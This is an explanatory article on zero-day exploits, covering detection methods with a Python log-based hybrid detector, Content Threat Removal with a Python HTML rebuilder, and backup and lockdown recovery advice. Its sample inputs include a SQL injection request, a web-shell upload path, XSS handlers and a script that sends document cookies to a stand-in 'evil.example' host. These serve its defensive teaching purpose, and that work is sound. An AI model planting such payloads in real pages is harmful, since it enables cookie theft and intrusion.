Zero-Day Exploits Defined
“Zero-day” is a loose term for a vulnerability that the software vendor does not yet know about (and so has no patch for), or for an exploit that targets such a vulnerability. These threats are especially dangerous because the attacker knows about the flaw while the vendor and defenders do not, so no fix and no detection signature exist yet. Such vulnerabilities can go unnoticed for years and are often sold on the black market for large sums of money.
A vulnerability is considered “zero-day” up to and including the day the vendor learns of it, with “zero” referring to the number of days the vendor has had to prepare a fix. “Day zero” is the day the vendor learns of the vulnerability and begins working on a patch; in everyday usage the term is also applied to the window after disclosure but before a patch ships. The Common Vulnerabilities and Exposures (CVE) list is a catalog of publicly disclosed vulnerabilities; a true zero-day, by definition, has no CVE entry until it is disclosed.
How Do You Detect a Zero-Day Attack?
While zero-day attacks are, by definition, very difficult to detect, several strategies have emerged:
- Statistics-based detection uses machine learning on historical data, both previously detected exploits and ordinary traffic, to build a baseline of expected system behavior and flag statistically unusual deviations from it. On its own this method has limited effectiveness and produces false positives and negatives, but it works well as one component of a hybrid solution.
- Signature-based detection matches files and traffic against a database of known malware and exploit signatures. It is reliable for threats that are already cataloged, and machine learning can generalize signatures so that close variants of known malware are also caught, but a genuinely new exploit will not match any existing signature.
- Behavior-based detection identifies malware from its interactions with the target system. Rather than inspecting the code of an incoming file, it analyzes how the file interacts with existing software and judges whether those interactions look like a malicious attack.
- Hybrid detection combines the above three techniques to take advantage of their strengths while mitigating their weaknesses.
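The four approaches above, combined into one small detector run over constructed web-server access logs. This is an added example written for this page, not code from any product the page describes; the log format, the signature list, the z-score threshold and the scoring weights are all assumptions chosen for illustration.

```python
import re
import statistics
from collections import Counter, defaultdict, namedtuple
from urllib.parse import unquote

# Constructed sample access logs (illustrative, not real traffic).
# Line format assumed here: "<HH:MM> <client-ip> <method> <path> <status>"
BASELINE_LOG = """\
10:00 10.0.0.5 GET /index.php 200
10:00 10.0.0.5 GET /about.php 200
10:00 10.0.0.6 GET /index.php 200
10:01 10.0.0.7 GET /index.php 200
10:01 10.0.0.7 GET /login.php 200
10:02 10.0.0.6 GET /contact.php 200
10:02 10.0.0.8 GET /login.php 200
10:03 10.0.0.5 GET /about.php 200
"""

LIVE_LOG = """\
10:10 10.0.0.5 GET /index.php 200
10:10 10.0.0.9 GET /index.php?id=1%20UNION%20SELECT%201,2,3 200
10:10 10.0.0.10 GET /index.php 200
10:10 10.0.0.10 GET /about.php 200
10:10 10.0.0.10 GET /contact.php 200
10:10 10.0.0.10 GET /login.php 200
10:10 10.0.0.10 GET /backup.zip 404
10:10 10.0.0.10 GET /config.php 200
10:11 10.0.0.11 POST /uploads/shell.php 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")
Request = namedtuple("Request", "minute client method path status")

def parse(log):
    reqs = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:  # malformed lines are skipped rather than crashing the detector
            minute, client, method, path, status = m.groups()
            # percent-decode so signatures see the real payload, not its encoding
            reqs.append(Request(minute, client, method, unquote(path), int(status)))
    return reqs

# 1. Signature-based: patterns for *known* attack classes (tiny, illustrative list).
SIGNATURES = {
    "sqli": re.compile(r"union\s+select", re.I),
    "path_traversal": re.compile(r"\.\./"),
}

def signature_hits(req):
    return [name for name, rx in SIGNATURES.items() if rx.search(req.path)]

# 2. Statistics-based: learn what "normal" looks like from a clean window.
class Baseline:
    def __init__(self, reqs):
        per_client_minute = Counter((r.client, r.minute) for r in reqs)
        rates = list(per_client_minute.values())
        self.mean = statistics.mean(rates)
        self.stdev = statistics.pstdev(rates) or 1.0  # guard a perfectly flat baseline
        self.known_paths = {r.path.split("?")[0] for r in reqs}
        self.known_methods = {r.method for r in reqs}

def rate_spikes(reqs, baseline, z_threshold=3.0):
    """Clients whose per-minute request rate is > z_threshold std devs above normal."""
    counts = Counter((r.client, r.minute) for r in reqs)
    return {client for (client, _), n in counts.items()
            if (n - baseline.mean) / baseline.stdev > z_threshold}

# 3. Behavior-based: not what the request contains, but how it interacts with the app.
def behavior_hits(req, baseline):
    reasons = []
    if req.method not in baseline.known_methods:
        reasons.append("unseen method")
    if req.path.split("?")[0] not in baseline.known_paths and 200 <= req.status < 300:
        reasons.append("success on unseen path")  # e.g. a dropped web shell answering 200
    return reasons

# 4. Hybrid: weight the signals so a weak one never raises an alert on its own.
def hybrid_detect(live_log, baseline, alert_threshold=2):
    reqs = parse(live_log)
    spiking = rate_spikes(reqs, baseline)
    alerts = defaultdict(set)  # client -> reasons
    for r in reqs:
        score, reasons = 0, set()
        if sigs := signature_hits(r):
            score += 3  # known-bad: decisive by itself
            reasons.update(f"signature:{s}" for s in sigs)
        if behs := behavior_hits(r, baseline):
            score += 2  # suspicious interaction: decisive by itself
            reasons.update(f"behavior:{b}" for b in behs)
        if r.client in spiking:
            score += 1  # noisy alone, useful in combination
            reasons.add("stats:rate-spike")
        if score >= alert_threshold:
            alerts[r.client] |= reasons
    return dict(alerts)
```

Running `hybrid_detect(LIVE_LOG, Baseline(parse(BASELINE_LOG)))` flags 10.0.0.9 on a signature alone, 10.0.0.10 on the combination of a rate spike and a successful request to a path the baseline never served, and 10.0.0.11 on behavior alone (an unseen method hitting an unseen path). The client that only spiked would not be reported without the behavioral corroboration, which is the point of weighting the signals rather than treating each as a separate alarm.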
Zero-Day Exploit Recovery
It is almost impossible to prevent zero-day attacks, as their existence can stay hidden even after the vulnerability is exploited. However, emerging technologies and techniques can provide some layer of protection against these threats, and there are steps you can take to mitigate damage once an exploit is discovered.
Content Threat Removal (CTR)
CTR is a transformation-based defense technology, not a detection-based one, that intercepts data on its way to its destination. It assumes all data is hostile and never delivers the original bytes; instead it extracts only the business information the data carries and rebuilds that information into a new, known-safe form. Because the delivered object is constructed from scratch, any potentially dangerous elements of the original, whether known or unknown, are discarded without having to be recognized first.
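A reduced illustration of the extract-and-rebuild approach, applied to HTML only. This is an added example written for this page, not the code of any CTR product; the element allow-list, the accepted URL schemes and the sample document are assumptions. Note that nothing in it tries to recognise the hostile parts of the input: they disappear simply because they are never copied into the rebuilt document.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample of a hostile document (illustrative, not a real attack).
UNTRUSTED = """<html><head>
<script>fetch('https://evil.example/steal?c=' + document.cookie)</script>
<style>body{display:none}</style></head>
<body onload="alert(1)">
<h1 onmouseover="alert(2)">Q3 invoice</h1>
<p>Total due: &euro;4,200 &lt; budget. Pay via <a href="javascript:alert(3)">portal</a>
or <a href="https://pay.example.com/inv/42" onclick="alert(4)">this link</a>.</p>
<img src=x onerror="alert(5)">
<iframe src="https://evil.example/"></iframe>
<p>Regards</p>
</body></html>"""

# The only "business information" carried across: text inside these blocks, and
# links whose target uses an allow-listed scheme. Nothing else is ever copied.
TEXT_ELEMENTS = {"p", "h1", "h2", "h3"}
SKIP_ELEMENTS = {"script", "style", "noscript", "template"}
ALLOWED_SCHEMES = {"http", "https"}


class ContentExtractor(HTMLParser):
    """Reduce untrusted HTML to a minimal model: a list of (tag, parts)."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.blocks = []      # (tag, parts); a part is str or ("a", href, text)
        self._current = None  # parts of the block being built, or None
        self._skip = 0        # >0 while inside script/style/...
        self._link = None     # (href, [text pieces]) while inside <a>

    def _close_link(self):
        href, pieces = self._link
        self._link = None
        text = "".join(pieces)
        if urlsplit(href).scheme in ALLOWED_SCHEMES:
            self._current.append(("a", href, text))
        else:  # javascript:, data:, vbscript: ... keep the words, drop the target
            self._current.append(text)

    def handle_starttag(self, tag, attrs):
        if tag in SKIP_ELEMENTS:
            self._skip += 1
        elif self._skip == 0:
            if tag in TEXT_ELEMENTS:
                self._current = []
            elif tag == "a" and self._current is not None:
                self._link = (dict(attrs).get("href") or "", [])
            # every other tag, and every attribute (onload, onerror, ...), is ignored

    def handle_endtag(self, tag):
        if tag in SKIP_ELEMENTS:
            self._skip = max(0, self._skip - 1)
        elif tag == "a" and self._link is not None:
            self._close_link()
        elif tag in TEXT_ELEMENTS and self._current is not None:
            if self._link is not None:  # unclosed <a> inside the block
                self._close_link()
            self.blocks.append((tag, self._current))
            self._current = None

    def handle_data(self, data):
        if self._skip or self._current is None:
            return  # text outside an allowed block is not business information
        (self._link[1] if self._link is not None else self._current).append(data)


def rebuild(blocks):
    """Generate a brand-new document from the model; original bytes never pass through."""
    out = ["<!DOCTYPE html>", "<html><body>"]
    for tag, parts in blocks:
        inner = []
        for part in parts:
            if isinstance(part, tuple):
                _, href, text = part
                inner.append(f'<a href="{escape(href)}">{escape(text)}</a>')
            else:
                inner.append(escape(part))
        text = "".join(inner).strip()
        if text:
            out.append(f"<{tag}>{text}</{tag}>")
    out.append("</body></html>")
    return "\n".join(out)


def content_threat_removal(untrusted_html):
    extractor = ContentExtractor()
    extractor.feed(untrusted_html)
    extractor.close()
    return rebuild(extractor.blocks)
```

For the sample above, `content_threat_removal(UNTRUSTED)` yields a document containing only the heading, the two paragraphs and the one https link; the script, stylesheet, event handlers, image, iframe and `javascript:` target are absent. The trade-off is visible too: the relative or unusual links a real business document might rely on would also be flattened to text, which is why production CTR products define the "business information" model per file format with more care than this sketch.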
Disaster Recovery Strategy
If you are affected by a zero-day attack, it is critical to have a comprehensive disaster recovery strategy in place to limit the damage. This includes keeping backups in a combination of on-site and cloud-based storage, with at least one copy offline or immutable so that an attacker who reaches production cannot also destroy the backups.
One of the most common recovery methods for a zero-day attack is to remove all access, physically or via a network-based firewall, from anyone who would be able to exploit it until a patch is available. For example, if WordPress were vulnerable to a zero-day exploit that granted full, unauthenticated read/write access, one course of action would be to take the website offline, or restrict it to trusted addresses, until a patch is released.